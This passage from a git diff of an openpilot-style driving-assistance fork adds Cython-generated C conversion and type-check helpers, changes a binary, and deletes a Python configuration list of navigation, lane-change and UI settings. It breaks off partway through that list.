0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* CIntFromPy */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ +#if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/common/clock.so b/common/clock.so index 2f3ea2ca7..4726edc4d 100755 Binary files a/common/clock.so and b/common/clock.so differ diff --git a/common/dp_conf.py b/common/dp_conf.py deleted file mode 100644 index 16170abce..000000000 --- a/common/dp_conf.py +++ /dev/null @@ -1,319 +0,0 @@ -#!/usr/bin/env python3.7 -#pylint: skip-file -import os -import sys -import json -import time -from math import floor -from system.hardware import TICI - -''' -* type: Bool, Int8, UInt8, UInt16, Float32 -* conf_type: param, struct -* dependencies needs to use struct and loaded prior so we don't have to read the param multiple times. -* update_once: True, False (the param will only load up once, need both param and struct defined) -''' -confs = [ - # custom api server - {'name': 'dp_api_custom', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_api_custom_url', 'default': 'https://api.retropilot.org', 'type': 'Text', 'depends': [{'name': 'dp_api_custom', 'vals': [True]}], 'conf_type': ['param']}, - - {'name': 'dp_atl', 'default': 0, 'type': 'UInt8', 'conf_type': ['param', 'struct'], 'update_once': True}, - - {'name': 'dp_locale', 'default': 'en-US', 'type': 'Text', 'conf_type': ['param', 'struct'], 'update_once': True}, - {'name': 'dp_jetson', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - - # nav service - {'name': 'dp_nav', 'default': True if TICI else False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_otisserv', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_nav_mapbox_token_pk', 'default': '', 'type': 'Text', 'conf_type': ['param']}, - {'name': 'dp_nav_mapbox_token_sk', 'default': '', 'type': 'Text', 'conf_type': ['param']}, - {'name': 'dp_nav_full_screen', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_nav_gmap_enable', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_nav_gmap_key', 'default': '', 'type': 'Text', 'conf_type': ['param']}, - {'name': 'dp_nav_amap_enable', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_nav_amap_key', 'default': '', 'type': 'Text', 'conf_type': ['param']}, - {'name': 'dp_nav_amap_key_2', 'default': '', 'type': 'Text', 'conf_type': ['param']}, - #{'name': 'dp_nav_style_day', 'default': 'mapbox://styles/rav4kumar/ckv7dtfba6oik15r0w8dh1c1q', 'type': 'Text', 'conf_type': ['param']}, - #{'name': 'dp_nav_style_night', 'default': 'mapbox://styles/rav4kumar/ckvsf3f4u0zb414tcz9vof5jc', 'type': 'Text', 'conf_type': ['param']}, - - # gpxd - {'name': 'dp_gpxd', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - - # assign car via param - # echo -n TOYOTA C-HR 2021 > /data/params/d/dp_car_assigned - {'name': 'dp_car_assigned', 'default': '', 'type': 'Text', 'conf_type': ['param']}, - {'name': 'dp_car_list', 'default': '', 'type': 'Text', 'conf_type': ['param']}, - - {'name': 'dp_last_modified', 'default': str(floor(time.time())), 'type': 'Text', 'conf_type': ['param']}, - - # lateral - alc - {'name': 'dp_lateral_mode', 'default': 1, 'type': 'UInt8', 'min': 0, 'max': 2, 'conf_type': ['param', 'struct']}, - # {'name': 'dp_signal_off_delay', 'default': 3., 'type': 'Float32', 'min': 0., 'max': 10., 'depends': [{'name': 'dp_lateral_mode', 'vals': [0]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lc_min_mph', 'default': 15, 'type': 'UInt8', 'min': 0, 'max': 255, 'depends': [{'name': 'dp_lateral_mode', 'vals': [1, 2]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lc_auto_min_mph', 'default': 40, 'type': 'UInt8', 'min': 0, 'max': 255, 'depends': [{'name': 'dp_lateral_mode', 'vals': [2]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lc_auto_delay', 'default': 3., 'type': 'Float32', 'min': 0., 'max': 10., 'depends': [{'name': 'dp_lateral_mode', 'vals': [2]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lateral_lanelines', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_lateral_camera_offset', 'default': 4 if TICI else -6, 'type': 'Int8', 'min': -100, 'max': 100, 'depends': [{'name': 'dp_lateral_lanelines', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lateral_path_offset', 'default': 4 if TICI else 0, 'type': 'Int8', 'min': -100, 'max': 100, 'depends': [{'name': 'dp_lateral_lanelines', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lateral_road_edge_detected', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - - #ui - {'name': 'dp_ip_addr', 'default': '', 'type': 'Text', 'conf_type': ['struct']}, - {'name': 'dp_quiet_drive', 'default': 0, 'type': 'UInt8', 'min': 0, 'max': 2, 'conf_type': ['param']}, - {'name': 'dp_ui_top', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_ui_side', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - #{'name': 'dp_ui_volume', 'default': -5, 'type': 'Int8', 'min': -5, 'max': 100, 'conf_type': ['param', 'struct']}, - {'name': 'dp_ui_brightness', 'default': 0, 'type': 'UInt8', 'min': 0, 'max': 100, 'conf_type': ['param', 'struct']}, - {'name': 'dp_ui_display_mode', 'default': 0, 'type': 